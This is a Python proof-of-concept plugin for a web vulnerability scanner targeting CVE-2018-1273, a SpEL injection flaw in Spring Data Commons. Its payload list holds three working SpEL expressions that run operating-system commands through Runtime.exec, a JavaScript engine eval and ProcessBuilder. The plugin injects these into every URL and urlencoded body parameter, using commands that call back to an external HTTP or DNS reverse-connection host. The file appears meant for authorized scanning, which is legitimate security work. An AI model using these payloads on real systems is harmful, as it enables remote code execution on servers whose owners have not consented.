# !/usr/bin/env python3
# @Time    : 2020/11/24
# @Author  : caicai
# @File    : poc_srping_cve-2018-1273_2018.py
from myscan.lib.parse.dictdata_parser import dictdata_parser  # 写了一些操作dictdata的方法的类
from myscan.lib.core.base import PocBase
from myscan.lib.core.common_reverse import generate, query_reverse, generate_reverse_payloads
from myscan.lib.core.threads import mythread
from myscan.lib.helper.request import request  # 修改了requests.request请求的库，建议使用此库，会在redis计数
from myscan.config import reverse_set

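'''
验证这个漏洞代价比较大

poc不好写，先判断是不是spring框架，通过简单的文件扩展名后缀来判断
其次不可能每个包都发payload，发包太大，而且还需要反连平台，先暂定urlencode的类型。

Verifying this vulnerability is expensive.

A precise PoC is hard to write. The target is therefore first guessed to be a Spring
application from the URL's file extension: only extension-less URLs are tested.
Sending payloads for every request would generate too much traffic, and a
reverse-connection platform is also required. For now, only URL parameters are
tested, plus body parameters when the body is urlencoded.
'''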


class POC(PocBase):
    """PoC for CVE-2018-1273 (Spring Data Commons SpEL injection).

    Injects SpEL expressions that run a reverse-connection command into each
    request parameter, then asks the reverse platform (HTTP and DNS tokens)
    whether any payload called back.
    """

    def __init__(self, workdata):
        # Python dict describing the request/response; see
        # docs/开发指南 "Example dict数据示例" for its layout.
        self.dictdata = workdata.get("dictdata")
        self.parse = dictdata_parser(self.dictdata)
        # URL under test WITHOUT query parameters,
        # e.g. https://www.baidu.com/index.php#tip1 (no "?keyword=1").
        self.url = workdata.get("data")
        # Findings: dicts with name, url, level and detail (detail must be a dict).
        self.result = []
        self.name = "srping_cve-2018-1273"
        self.vulmsg = "detail:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1273"
        self.level = 2  # 0:Low  1:Medium 2:High
        self.saveflags = {}
        # (template, transform) pairs: each template has exactly one %s slot,
        # filled with transform(cmd).
        self.payloads = [
            ('''[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("%s")]''', lambda x: x),
            (
                '''[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('%s')")]''',
                lambda x: x),
            (
                # ProcessBuilder needs an argv array: the command's spaces are
                # replaced by "xxxxxx" so the SpEL-side split() rebuilds argv.
                '''[(#root.getClass().forName("java.lang.ProcessBuilder").getConstructor('foo'.split('').getClass()).newInstance('%s'.split('xxxxxx'))).start()]''',
                lambda x: "xxxxxx".join(x.split(" ")))
        ]
        self.hexdatas = []

    def verify(self):
        """Send every SpEL payload and record a finding if a callback arrives.

        Only URLs without a file extension are tested (a cheap heuristic for
        Spring endpoints), and the can_output() gate limits reporting to once
        per root path.
        """
        # Equivalent to the former `extension not in ""` for strings (that was
        # a substring test, i.e. `extension != ""`), but no longer raises
        # TypeError when the extension is None.
        if self.dictdata.get("url").get("extension"):
            return
        if not self.can_output(self.parse.getrootpath() + self.name):  # report only once
            return

        params = self._collect_params()

        # Which parameter is vulnerable is not pinpointed; every param is tried.
        payloads_, hexdata = generate_reverse_payloads(self.name)
        _, dnshexdata = generate_reverse_payloads(self.name, "dns")
        cmds = self._build_cmds(payloads_, dnshexdata)

        reqs = [
            self.parse.getreqfromparam(param, "a", template % func(cmd), False)
            for param in params
            for cmd in cmds
            for template, func in self.payloads
        ]
        mythread(self.send, reqs)

        # Only the first query is asked to sleep (wait for callbacks); the
        # second one reuses that waiting time.
        sleep = True
        for token in (hexdata, dnshexdata):
            query_res, _ = query_reverse(token, sleep)
            sleep = False
            if query_res:
                self._report(token)
                break

    def _collect_params(self):
        """Return URL params plus urlencoded body params as a NEW list."""
        request_info = self.dictdata.get("request")
        params_info = request_info.get("params")
        # Copy instead of `+=` on the original list: that extended params_url
        # in place and silently mutated self.dictdata (possibly shared with
        # the caller).
        params = list(params_info.get("params_url") or [])
        if request_info.get("content_type") == 1:  # body is urlencoded
            params.extend(params_info.get("params_body") or [])
        return params

    @staticmethod
    def _build_cmds(payloads_, dnshexdata):
        """Return each reverse payload followed by its DNS-token variant."""
        http_ip = reverse_set.get("reverse_http_ip")
        cmds = []
        for payload in payloads_:
            cmds.append(payload)
            # DNS variant: substitute the DNS token for the HTTP reverse IP.
            cmds.append(payload.replace(http_ip, dnshexdata))
        return cmds

    def _report(self, token):
        """Append a finding for the given reverse token and mark it as output."""
        rootpath = self.parse.getrootpath()
        self.result.append({
            "name": self.name,
            "url": rootpath,
            "level": self.level,  # 0:Low  1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                # NOTE(review): key has a trailing colon; kept as-is in case
                # consumers of the result depend on it.
                "others:": "{} in dnslog".format(token),
                "request": self.parse.getrequestraw(),
                "response": self.parse.getresponseraw()
            }
        })
        self.can_output(rootpath + self.name, True)

    def send(self, req):
        """Fire one prepared request; detection relies on the reverse callback."""
        request(**req)
